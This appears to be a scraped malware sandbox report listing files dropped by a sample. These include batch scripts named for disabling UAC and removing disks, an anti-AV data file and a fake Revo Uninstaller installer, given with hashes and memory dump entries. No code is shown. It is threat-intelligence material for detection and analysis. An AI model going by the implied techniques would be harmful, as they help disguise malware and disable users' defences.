105KB

MD5
687cc2fd21ae18a05a907e3f0b27411b

SHA1
7a5129c77d6721ea8c3aceab90c1b5576638d14b

SHA256
6d09ddc3211e2840fcbcb463a22daf52664ef5d0f7234bb39ebeaaf5a0b8e632

SHA512
a69138598acb78954b99f986afa08d69ebd607a79d2733cfb904473651b34ff10aa6a6a08704f0d0bafafd962af7093b510addf3d1909523a8e8884c505e3b59

Download Submit
C:\ProgramData\WsrD\DisableUserAccountControl.bat
Filesize
17KB

MD5
e02bb39aab8a10eba07f113d7a548f9c

SHA1
2dcd92059dea564ef18b7bdbc931623a566628da

SHA256
96deb3e68b5bc4bd430624fd5d79113d0fb018b0afc401380b4662b4f0d9c617

SHA512
4b908a5b1eef6c799c057299d3b6c70aa567962edf42f390d330a5c6c0c2fd00872708f7f3d56d4323f7773ad1c15e663798e08f7c309c219555ee656de49223

Download Submit
C:\ProgramData\WsrD\DiskRemoval.bat
Filesize
254B

MD5
8c3372370db3c9dc3198135ad3162d20

SHA1
a30bf13314631716719094e52fd6e132f442fdbf

SHA256
63c360cd9f78fc0753a498f45b86c377416881e5560ea3de7908051c93bc0931

SHA512
6740d093a86c1f5121ee3c6db351152b9f97b06b0bad2a18545964d2e9e2d557cff07e6461e0772c0caa46ee265f82bf85ea78c512a98d377e0b8b261e7cd347

Download Submit
C:\ProgramData\WsrD\MMF.vbs
Filesize
30KB

MD5
bd64d967bf72703baaf72bfb5b353b4b

SHA1
ce34e28d066cd9b18d7fd7877c61481dfb6767cb

SHA256
c79920873a439db91c50ec806da982920d8b3d06f9fdfda0b457acaa6220606a

SHA512
ef79c00a3d4c7a66872cc55400f4db14f106f5a5852798fc98df298f801cddc744d20648dfeea2bfee229496cf6cefbe2b92925b82e579c4f6fa26e4c507de43

Download Submit
C:\ProgramData\WsrD\extracted\ANTIAV~1.DAT
Filesize
2.0MB

MD5
8ceec208145b1d1f26fc47503edb0a80

SHA1
29933f0907627f967044df7e297c3b806f4ca39d

SHA256
ae3a9d6b2f49629750beedd4f0708b899b6b79b27cf904521e89e017794534eb

SHA512
26b2eed60d4217b8cb95a6e6674b6feaba16b5660e6420f78f2467e1e20c51637b29a8c79e44526a43cccea5827d120d5804957e4dcc429c4bbfcf14aae72b9b

Download Submit
C:\ProgramData\WsrD\extracted\file_1.zip
Filesize
1.2MB

MD5
506fce55cfc87027055296a6a2863826

SHA1
43752a732db857183b87d552377b00515427db39

SHA256
610c870b3bdb17010f9d866b705e999b49c477e6ed3727774b4b5f311da2cf8a

SHA512
bc459438522960a94fefc6aa838631275b24518a800255716811e3c6cd924cbe431ccc88d974f269058655de674d43e977e83361a3821bfe0328ef64b87ff785

Download Submit
C:\ProgramData\WsrD\extracted\file_2.zip
Filesize
1.2MB

MD5
0a1fb9ad84cf9697f6092ffa9f43a2b4

SHA1
7a8a747117b8722a53ce7564dda55872554cb004

SHA256
80e16abd7da579d0f29eacabd1a1898a887a95fd9e7d3360c96d6a9ff8f95710

SHA512
5521e83d8b38ffa7bb67d19b07802c2606852c4fe59d9bfc8106e1cee1f091d42d262174f49e0d91c0b404162a24516143a1dd4d2349320344186da9b416a8e0

Download Submit
C:\ProgramData\WsrD\extracted\file_3.zip
Filesize
2.7MB

MD5
0cbfe9677da8a8edb981106803628708

SHA1
2d9b5b2db605b452c7ad3c14ac55bffe97f84b52

SHA256
df6102a874cb0b19e8ab9ecef406bc6965d7c9b3bbf394eadd07aad33263e0df

SHA512
1a3a45179d4a3af16231dea3394d73aa1322f39a01218ec912bc94cf435f5988560c2573fc03b09f82634704cd38f1d790b8469889d402de233a52c22111d6b5

Download Submit
C:\ProgramData\WsrD\extracted\iMtu_gQB.exe
Filesize
1.9MB

MD5
dd0146c74694b0d0a32bab320a8a9ee5

SHA1
e706f8d4f153b5c60e502f947bded7950f19a901

SHA256
429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035

SHA512
72bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1

Download Submit
C:\ProgramData\WsrD\file.bin
Filesize
2.7MB

MD5
b3d91bf02bb2ed70c3d8f8e0ab7488a1

SHA1
d4eeede743d167d40975d0cc2387a36b80365c31

SHA256
f6f91250f54fb99b54acd1c421589edb1a2224cf6818d7b0dd3890971a1c1787

SHA512
2e12621b5adfe433ae5a96b82946fe0a3c37e4abd6c319fc2c7c1a1d30449630e5beaab515ea0316f19883ba7c4ad7519b5d6facf47b69be940de8e96c9fe274

Download Submit
C:\ProgramData\WsrD\iMtu_gQB.exe
Filesize
1.9MB

MD5
dd0146c74694b0d0a32bab320a8a9ee5

SHA1
e706f8d4f153b5c60e502f947bded7950f19a901

SHA256
429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035

SHA512
72bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1

Download Submit
C:\ProgramData\WsrD\iMtu_gQB.exe
Filesize
1.9MB

MD5
dd0146c74694b0d0a32bab320a8a9ee5

SHA1
e706f8d4f153b5c60e502f947bded7950f19a901

SHA256
429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035

SHA512
72bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1

Download Submit
C:\ProgramData\WsrD\main.bat
Filesize
407B

MD5
d6b76e5702e5878373d5ef3078aee188

SHA1
ab4af65c920efb012d698a48dc65156c12213c12

SHA256
426beead9653cd7081fe00afe57690b84bb419e43825943251af3aae52a39465

SHA512
fa2d19be96ad40b37b01ed71f3d4359a84738e371e16f1fef933a3f77b3a856a6ad27b055cebb977b1ee772a82e070754b856f39023b8f55522d8e8b589eec03

Download Submit
C:\Users\Admin\AppData\Local\Temp\4acacee3-cefe-4dab-b6f1-01f9a63ec79a\e.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-7219N.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-88NUQ.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp
Filesize
2.5MB

MD5
d0e24e6d7017127bea02bb0160229bee

SHA1
34350e5b7f268797b2a7ec56390c2228f841b37b

SHA256
ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994

SHA512
f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QBI7H.tmp\Revo Uninstaller Pro 4.2.3.tmp
Filesize
1.2MB

MD5
d0bf64e27284709966a4e2efef3233ef

SHA1
f3d6c99e57ae9dda35fc24bbf4c1eb1e08a875f0

SHA256
2019350b1451f4653d27c33b1c034155ce81534f318cd2e3591dd2ee73c77f09

SHA512
4ef3c96a47327c6a061b3b71451018e83936670efd7eb17d60b5a834218ae39614d8c68cb2c0b31a423742a6d8e41eabcecea3e13d5fad728f8745bd9dc2984b

Download Submit
memory/64-154-0x0000000000000000-mapping.dmp

Download
memory/356-203-0x0000000000000000-mapping.dmp

Download
memory/628-191-0x0000000000000000-mapping.dmp

Download
memory/1136-161-0x0000000000000000-mapping.dmp

Download
memory/1236-152-0x0000000000000000-mapping.dmp

Download
memory/1244-177-0x0000000000000000-mapping.dmp

Download
memory/1440-151-0x0000000000000000-mapping.dmp

Download
memory/1488-185-0x0000000000000000-mapping.dmp

Download
memory/1516-142-0x0000000000000000-mapping.dmp

Download
memory/1668-209-0x0000000000000000-mapping.dmp

Download
memory/1668-213-0x0000000005860000-0x00000000058A4000-memory.dmp

Filesize
272KB

Download
memory/1668-214-0x0000000005950000-0x00000000059E2000-memory.dmp

Filesize
584KB

Download
memory/1668-212-0x0000000005DC0000-0x0000000006364000-memory.dmp

Filesize
5.6MB

Download
memory/1668-216-0x0000000074630000-0x00000000746B9000-memory.dmp

Filesize
548KB

Download
memory/1668-211-0x0000000000770000-0x0000000000950000-memory.dmp

Filesize
1.9MB

Download
memory/1676-164-0x0000000000000000-mapping.dmp

Download
memory/1680-178-0x0000000000000000-mapping.dmp

Download
memory/1748-174-0x0000000000000000-mapping.dmp

Download
memory/1820-179-0x0000000000000000-mapping.dmp

Download
memory/1848-195-0x0000000000000000-mapping.dmp

Download
memory/2032-149-0x0000000000000000-mapping.dmp

Download
memory/2044-133-0x0000000000000000-mapping.dmp

Download
memory/2088-147-0x0000000000000000-mapping.dmp

Download
memory/2140-218-0x0000000000000000-mapping.dmp

Download
memory/2140-221-0x0000000000900000-0x0000000000993000-memory.dmp

Filesize
588KB

Download
memory/2140-224-0x0000000000900000-0x0000000000993000-memory.dmp

Filesize
588KB

Download
memory/2140-227-0x0000000000900000-0x0000000000993000-memory.dmp

Filesize
588KB

Download
memory/2340-157-0x0000000000000000-mapping.dmp

Download
memory/2540-159-0x0000000000000000-mapping.dmp

Download
memory/2552-130-0x0000000000400000-0x00000000004CE000-memory.dmp

Filesize
824KB

Download
memory/2552-132-0x0000000000400000-0x00000000004CE000-memory.dmp

Filesize
824KB

Download
memory/2684-175-0x0000000000000000-mapping.dmp

Download
memory/2748-188-0x0000000000000000-mapping.dmp

Download
memory/2952-136-0x0000000000000000-mapping.dmp

Download
memory/2952-138-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/2952-141-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/2960-158-0x0000000000000000-mapping.dmp

Download
memory/3176-168-0x0000000000000000-mapping.dmp

Download
memory/3208-170-0x0000000000000000-mapping.dmp

Download
memory/3404-187-0x0000000000000000-mapping.dmp

Download
memory/3496-182-0x0000000000000000-mapping.dmp

Download
memory/3664-166-0x0000000000000000-mapping.dmp

Download
memory/3812-169-0x0000000000000000-mapping.dmp

Download
memory/3820-171-0x0000000000000000-mapping.dmp

Download
memory/3884-167-0x0000000000000000-mapping.dmp

Download
memory/3892-189-0x0000000000000000-mapping.dmp

Download
memory/4024-172-0x0000000000000000-mapping.dmp

Download
memory/4028-199-0x0000000000000000-mapping.dmp

Download
memory/4048-162-0x0000000000000000-mapping.dmp

Download
memory/4052-183-0x0000000000000000-mapping.dmp

Download
memory/4320-150-0x0000000000000000-mapping.dmp

Download
memory/4392-165-0x0000000000000000-mapping.dmp

Download
memory/4492-181-0x0000000000000000-mapping.dmp

Download
memory/4580-144-0x0000000000000000-mapping.dmp

Download
memory/4616-180-0x0000000000000000-mapping.dmp

Download
memory/4624-156-0x0000000000000000-mapping.dmp

Download
memory/4648-153-0x0000000000000000-mapping.dmp

Download
memory/4764-160-0x0000000000000000-mapping.dmp

Download
memory/4952-155-0x0000000000000000-mapping.dmp

Download
memory/5008-163-0x0000000000000000-mapping.dmp

Download
memory/5044-173-0x0000000000000000-mapping.dmp

Download
memory/5116-176-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads